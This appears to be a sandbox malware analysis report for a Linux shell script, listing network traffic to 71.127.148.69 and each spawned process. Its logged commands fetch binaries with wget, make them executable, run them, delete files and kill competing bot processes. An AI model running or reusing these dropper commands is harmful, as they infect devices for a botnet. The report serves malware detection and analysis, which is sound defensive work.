    Mar 25, 2021 05:27:07.502043962 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.518172979 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.529306889 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.640589952 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.640635967 CET803948671.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.640945911 CET3948680192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.652055025 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.652385950 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.653872967 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.776567936 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.776614904 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.776643991 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.776674986 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.776823044 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.778024912 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.778074026 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.778080940 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901063919 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901124001 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901165962 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901201963 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901205063 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901227951 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901233912 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901247978 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901262045 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901288986 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:07.901316881 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:07.901338100 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:08.023917913 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.023979902 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024012089 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024040937 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024071932 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024111032 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024148941 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024188995 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024192095 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:08.024224997 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:08.024233103 CET803948871.127.148.69192.168.2.20
    Mar 25, 2021 05:27:08.024233103 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:08.024240971 CET3948880192.168.2.2071.127.148.69
    Mar 25, 2021 05:27:08.024245977 CET3948880192.168.2.2071.127.148.69

    HTTP Request Dependency Graph

    • 71.127.148.69

    System Behavior

    Analysis Process: sh PID: 4580 Parent PID: 4517

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:/bin/sh /tmp/1.sh
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4585 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4585 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty0 -O /var/run/tty0
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4603 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4603 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty0
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4604 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4604 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty0
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4605 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4606 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4606 Parent PID: 4580

    General

    Start time:05:27:06
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty1 -O /var/run/tty1
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4635 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4635 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty1
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4636 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4636 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty1
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4637 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4638 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4638 Parent PID: 4580

    General

    Start time:05:27:07
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty2 -O /var/run/tty2
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4667 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4667 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty2
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4668 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4668 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty2
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4669 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4670 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4670 Parent PID: 4580

    General

    Start time:05:27:08
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty3 -O /var/run/tty3
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4699 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4699 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty3
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4700 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4700 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty3
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4701 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4702 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4702 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty4 -O /var/run/tty4
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4731 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4731 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty4
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4732 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4732 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty4
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4733 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4734 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4734 Parent PID: 4580

    General

    Start time:05:27:09
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty5 -O /var/run/tty5
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4763 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4763 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty5
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4764 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4764 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty5
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4765 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4766 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4766 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/tty6 -O /var/run/tty6
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4795 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4795 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x /var/run/tty6
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4796 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4796 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 /var/run/tty6
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4797 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4798 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: wget PID: 4798 Parent PID: 4580

    General

    Start time:05:27:10
    Start date:25/03/2021
    Path:/usr/bin/wget
    Arguments:wget http://71.127.148.69/.x/pty -O pty
    File size:474656 bytes
    MD5 hash:458ce58ac4b1aac3eafc287fa46bf92d

    Analysis Process: sh PID: 4827 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4827 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod +x pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4828 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: chmod PID: 4828 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/chmod
    Arguments:chmod 700 pty
    File size:56112 bytes
    MD5 hash:32c8c7318223ebc5b934a78cfc153d6f

    Analysis Process: sh PID: 4829 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: pty PID: 4829 Parent PID: 4580

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:./pty
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: pty PID: 4831 Parent PID: 4829

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: pty PID: 4832 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4832 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/wgsh > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4833 Parent PID: 4832

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 4833 Parent PID: 4832

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/wgsh
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: pty PID: 4834 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4834 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/bbsh > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4883 Parent PID: 4834

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 4883 Parent PID: 4834

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/bbsh
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: pty PID: 4884 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4884 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "rm -rf /var/run/pty > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4901 Parent PID: 4884

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: rm PID: 4901 Parent PID: 4884

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/rm
    Arguments:rm -rf /var/run/pty
    File size:60272 bytes
    MD5 hash:b79876063d894c449856cca508ecca7f

    Analysis Process: pty PID: 4902 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4902 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 arm > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4903 Parent PID: 4902

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 4903 Parent PID: 3310

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 arm
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 4904 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4904 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 mips > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4906 Parent PID: 4904

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 4906 Parent PID: 3310

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 mips
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 4909 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4909 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 mipsel > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4933 Parent PID: 4909

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 4933 Parent PID: 3310

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 mipsel
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 4936 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4936 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 powerpc > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4960 Parent PID: 4936

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 4960 Parent PID: 3310

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 powerpc
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 4961 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4961 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 ppc > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 4989 Parent PID: 4961

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 4989 Parent PID: 4961

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 ppc
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 4993 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 4993 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 daemon.armv4l.mod > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5001 Parent PID: 4993

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5001 Parent PID: 4993

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 daemon.armv4l.mod
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 5004 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5004 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 daemon.i686.mod > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5029 Parent PID: 5004

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5029 Parent PID: 3310

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 daemon.i686.mod
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 5033 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5033 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 daemon.mips.mod > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5036 Parent PID: 5033

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5036 Parent PID: 5033

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 daemon.mips.mod
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 5038 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5038 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 daemon.mipsel.mod > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5045 Parent PID: 5038

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5045 Parent PID: 5038

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 daemon.mipsel.mod
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: pty PID: 5049 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:./pty
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5049 Parent PID: 4831

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "kill -9 `cat /tmp/.xs/*.pid` > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5064 Parent PID: 5049

    General

    Start time:05:27:11
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
